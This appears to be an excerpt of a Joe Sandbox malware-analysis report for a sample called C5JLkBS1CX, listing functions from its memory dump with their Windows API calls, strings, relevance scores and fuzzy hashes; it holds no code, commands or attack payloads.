Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b29690a017e44ac83fde016bd394babb8550273d09ab153fff785db6212c5ef4
Instruction ID: b38474af5a22ac782048730788ccf0b571bec971087344371d5da022d2bbf833
Opcode Fuzzy Hash: b29690a017e44ac83fde016bd394babb8550273d09ab153fff785db6212c5ef4
Instruction Fuzzy Hash: EDF06732240158BBE3205BA2EC0EEEB7A7DEBCBB11F001169FA04D10A19AE01A0186B5

Function 00647230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00647243
EnterCriticalSection.KERNEL32(?,?,005F0EE4,?,?), ref: 00647254
TerminateThread.KERNEL32(00000000,000001F6,?,005F0EE4,?,?), ref: 00647261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,005F0EE4,?,?), ref: 0064726E

Part of subcall function 00646C35: CloseHandle.KERNEL32(00000000,?,0064727B,?,005F0EE4,?,?), ref: 00646C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00647281
LeaveCriticalSection.KERNEL32(?,?,005F0EE4,?,?), ref: 00647288

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f3fd1b8f7a90ce91eed5de94e5599832f149090cd0828d6693fe56d4e758f5f7
Instruction ID: 588765158c5d685ed6ae3361569141ea2ee3cc97a31922ed159bc6bad4fcb0f0
Opcode Fuzzy Hash: f3fd1b8f7a90ce91eed5de94e5599832f149090cd0828d6693fe56d4e758f5f7
Instruction Fuzzy Hash: 9DF03A36544612ABD7511BA4FD9C9DB772BFF45702B111631F502910A0CBB66A41CE50

Function 00638992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063899D
UnloadUserProfile.USERENV(?,?), ref: 006389A9
CloseHandle.KERNEL32(?), ref: 006389B2
CloseHandle.KERNEL32(?), ref: 006389BA
GetProcessHeap.KERNEL32(00000000,?), ref: 006389C3
HeapFree.KERNEL32(00000000), ref: 006389CA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 73c1a5371a6d288cd984929919681fd3b776469ef1b4f05bb3bae1c5b447dad3
Instruction ID: 662daae840f83f0ce40ca7614098ba1a08c7784e034b28c49252e3e1a747238c
Opcode Fuzzy Hash: 73c1a5371a6d288cd984929919681fd3b776469ef1b4f05bb3bae1c5b447dad3
Instruction Fuzzy Hash: 84E0C236004001FBDB011FE2FC0C90AFF6AFB8A362B109230F21981170CBB2A420DB90

Function 00637530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00672C7C,?), ref: 006376EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00672C7C,?), ref: 00637702
CLSIDFromProgID.OLE32(?,?,00000000,0066FB80,000000FF,?,00000000,00000800,00000000,?,00672C7C,?), ref: 00637727
_memcmp.LIBCMT ref: 00637748

Strings

,,g, xrefs: 0063753D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,g
API String ID: 314563124-619837891
Opcode ID: 278fabf37666f8aa9b6144bebd19907f270170266a304947418a5de0ed8083c8
Instruction ID: 927605c030b66b775c20a8ac75076a298b2f38bab288439e31a6bcedc198b470
Opcode Fuzzy Hash: 278fabf37666f8aa9b6144bebd19907f270170266a304947418a5de0ed8083c8
Instruction Fuzzy Hash: BE811F75A00109EFCB14DFA4C994DEEB7BAFF89315F104558F505AB250DB71AE06CBA0

Function 006585ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00658613
CharUpperBuffW.USER32(?,?), ref: 00658722
VariantClear.OLEAUT32(?), ref: 0065889A

Part of subcall function 00647562: VariantInit.OLEAUT32(00000000), ref: 006475A2
Part of subcall function 00647562: VariantCopy.OLEAUT32(00000000,?), ref: 006475AB
Part of subcall function 00647562: VariantClear.OLEAUT32(00000000), ref: 006475B7

Strings

Incorrect Parameter format, xrefs: 0065864B, 0065880D
AUTOIT.ERROR, xrefs: 00658728

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: e910c907084131a966624b0419fbd0b8191b18d28d76301f5d8e63c933cfa0bd
Instruction ID: f9889646301835d3306fa157036473f6fdbab0ccff2dc5332eaa6ee4d46e8708
Opcode Fuzzy Hash: e910c907084131a966624b0419fbd0b8191b18d28d76301f5d8e63c933cfa0bd
Instruction Fuzzy Hash: 76919C70608342DFCB14DF25C48495ABBE6FF89315F04492DF88A9B362DB30E909CB91

Function 00642A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9

_memset.LIBCMT ref: 00642B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00642BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00642C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00642C97

Strings

0, xrefs: 00642B73

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 4d78faee67855fed2fbce0542051b127f8b1b23fb33da9d3019f314f76375f95
Instruction ID: 5c4aaed3719e3d08e0e102a97ee27ad980e1ae13d35817533da0b717efcc37fd
Opcode Fuzzy Hash: 4d78faee67855fed2fbce0542051b127f8b1b23fb33da9d3019f314f76375f95
Instruction Fuzzy Hash: 8651E1715083029BD7A4DF28D8956AFBBE6EF85314F640A2DF881D32D1DB70CC448B56

Function 005F3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005F3277
_memmove.LIBCMT ref: 005F3310
_free.LIBCMT ref: 005F3336
_memmove.LIBCMT ref: 005F33E9

Strings

3c_, xrefs: 005F3225
__, xrefs: 005F3322

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c_$__
API String ID: 2620147621-43384800
Opcode ID: 3734aaee728c661f8bdbfe1a166d1909a3a36f5d69a3d5f375f5ec5e214581da
Instruction ID: fd7f7fe6404512aa97b29ebb4d1439ea36663e7bc2adb43eba2199897138d21e
Opcode Fuzzy Hash: 3734aaee728c661f8bdbfe1a166d1909a3a36f5d69a3d5f375f5ec5e214581da
Instruction Fuzzy Hash: CC516C716087458FEB65CF28C444B6BBBE5FF85310F04492DEA89973A1EB35E901CB52

Function 005F6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F6248
_memmove.LIBCMT ref: 005F62E4
_memset.LIBCMT ref: 005F6308

Strings

3c_, xrefs: 005F62AF
ERCP, xrefs: 005F61B3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c_$ERCP
API String ID: 2532777613-1852502410
Opcode ID: 514c525a0af44277f67cf3cbd8b8f6843bc9b88b49bb41a9a33fd99cd0b58273
Instruction ID: 3d7d2b6f4b62717a42f63351a7fa2f1e2ef6ae3920210065440e53423aab000a
Opcode Fuzzy Hash: 514c525a0af44277f67cf3cbd8b8f6843bc9b88b49bb41a9a33fd99cd0b58273
Instruction Fuzzy Hash: 1251907190070ADBDB24CF55C8857ABBBF5FF04304F20496EE54AC7281E774AA44CB90

Function 00642753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006427C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006427DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00642822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006A5890,00000000), ref: 0064286B

Strings

0, xrefs: 006427B5

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 2e21d18d1d5a96a4c1d8137c008c3961451dece79e0221dc3a88de7ecd07cbd5
Instruction ID: c03cab32bd502113a7fa9899ed5e8d57b1d36c4abb854b222f19aaf04b8688b8
Opcode Fuzzy Hash: 2e21d18d1d5a96a4c1d8137c008c3961451dece79e0221dc3a88de7ecd07cbd5
Instruction Fuzzy Hash: 6E41C0702043429FD724DF24C894B5ABBEAEF85310F64496DF8A697391DB70A809CB56

Function 0065D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0065D7C5

Part of subcall function 005E784B: _memmove.LIBCMT ref: 005E7899

Strings

none, xrefs: 0065D8A0
stdcall, xrefs: 0065D847
winapi, xrefs: 0065D836
cdecl, xrefs: 0065D81C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: dbe8c2d2172ebf91b309e751e26eadfce60a63527a0bf3a5c60eacc25b52331b
Instruction ID: 1543712db221c11096c3e6ed4c100f670a761864f6c884f7b8bf49268f54928c
Opcode Fuzzy Hash: dbe8c2d2172ebf91b309e751e26eadfce60a63527a0bf3a5c60eacc25b52331b
Instruction Fuzzy Hash: 5431C171A0420AABDF14EF58CC419EEB7B6FF54320F008629E865977D1DB31AD09CB80

Function 00638E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00638F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00638F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00638F57

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

Strings

ComboBox, xrefs: 00638E9E
ListBox, xrefs: 00638ED3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: d493a6f9404c751d861e4da56eb2a5fdfe005033728a57af49ac5110a905ec3e
Instruction ID: 9a10a70f7d6e81f1a4711437f22a037ff58052122e329411420601b39df07e33
Opcode Fuzzy Hash: d493a6f9404c751d861e4da56eb2a5fdfe005033728a57af49ac5110a905ec3e
Instruction Fuzzy Hash: 56212271A04208BEDB18ABA1DC49DFFBB6AEF45360F04412DF461972E1DB35090AD6A0

Function 0065182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0065184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00651872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006518A2
InternetCloseHandle.WININET(00000000), ref: 006518E9

Part of subcall function 00652483: GetLastError.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 00652498
Part of subcall function 00652483: SetEvent.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 006524AD

Strings

, xrefs: 00651893

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: e0c67f77bd317bf6c8ddda490ddc301b0664aa0ecb1fd32a79191a3a78f11cfc
Instruction ID: 78f81590262143583b99ec243089745cf1eff997491ce5ab7e73aba9bfefaf41
Opcode Fuzzy Hash: e0c67f77bd317bf6c8ddda490ddc301b0664aa0ecb1fd32a79191a3a78f11cfc
Instruction Fuzzy Hash: 6221C2B5500308BFEB219F60DC85FBF77EEEB4A746F10412AF8059A240DB608E0957A4

Function 006663E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00666461
LoadLibraryW.KERNEL32(?), ref: 00666468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0066647D
DestroyWindow.USER32(?), ref: 00666485

Strings

SysAnimate32, xrefs: 0066643C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: be0561dab567940e1d30f3814345ac150e47a4feef570284ad2837d76543629e
Instruction ID: d4a7a6db695721f5ef0e312e3e8448d9935a034b4fcc24c7c7bfc5ec69e46f3b
Opcode Fuzzy Hash: be0561dab567940e1d30f3814345ac150e47a4feef570284ad2837d76543629e
Instruction Fuzzy Hash: BC216D71200205BFEF108F64EC84EBB77EEEB59368F109629FA50922A0DB71DC5197A0

Function 00646D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00646DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00646DEF
GetStdHandle.KERNEL32(0000000C), ref: 00646E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00646E3B

Strings

nul, xrefs: 00646E36

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 77962d261891d20c03b1f387192e51714ce085bbec1431d3e89a834b1e431af7
Instruction ID: 73ff8c116b648bd8f07941490aaa85e7e6e764cd2c864743b2cb7d706c144905
Opcode Fuzzy Hash: 77962d261891d20c03b1f387192e51714ce085bbec1431d3e89a834b1e431af7
Instruction Fuzzy Hash: 5421A474A00209ABDB209F69DC44ADA7BFAFF46720F204629FCA1D73D0D7709951CB56

Function 00646E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00646E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00646EBB
GetStdHandle.KERNEL32(000000F6), ref: 00646ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00646F06

Strings

nul, xrefs: 00646F01

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 5d54fe8fa70c2abf15825e98929b01deef2eba9dfece0692bf4f531dbcc06a92
Instruction ID: 37517c2438f32de1b41dca3d81573e304118e337b1fe34d0729b9050f47f5bec
Opcode Fuzzy Hash: 5d54fe8fa70c2abf15825e98929b01deef2eba9dfece0692bf4f531dbcc06a92
Instruction Fuzzy Hash: BD21D079604305DBDB209F69DC44AAA77EAEF46724F200A19FCA0D73D0DB70A945CB12

Function 0064AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0064AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0064ACA8
__swprintf.LIBCMT ref: 0064ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0066F910), ref: 0064ACFF

Strings

%lu, xrefs: 0064ACBB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 36ae9c3664e38f571d495b2863cff9421d70e89565c9352edb56314b5a0cda58
Instruction ID: b4e5b45a86f4f443482c516bdbec2c49c8c08e26a972f242c3cf8db7daa10fe6
Opcode Fuzzy Hash: 36ae9c3664e38f571d495b2863cff9421d70e89565c9352edb56314b5a0cda58
Instruction Fuzzy Hash: B8218030A00149AFCB50DFA5D985DEEBBB9FF89314B004069F909EB352DB71EA45CB61

Function 00641142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 0064115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 00641184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 0064118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0063FCED,?,00640D40,?,00008000), ref: 006411C1

Strings

@d, xrefs: 0064119D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @d
API String ID: 2875609808-1890226142
Opcode ID: b82929fb7399f26f55ba69fb4c7603360005287f4bbf0bc46e13b7cb79dd6252
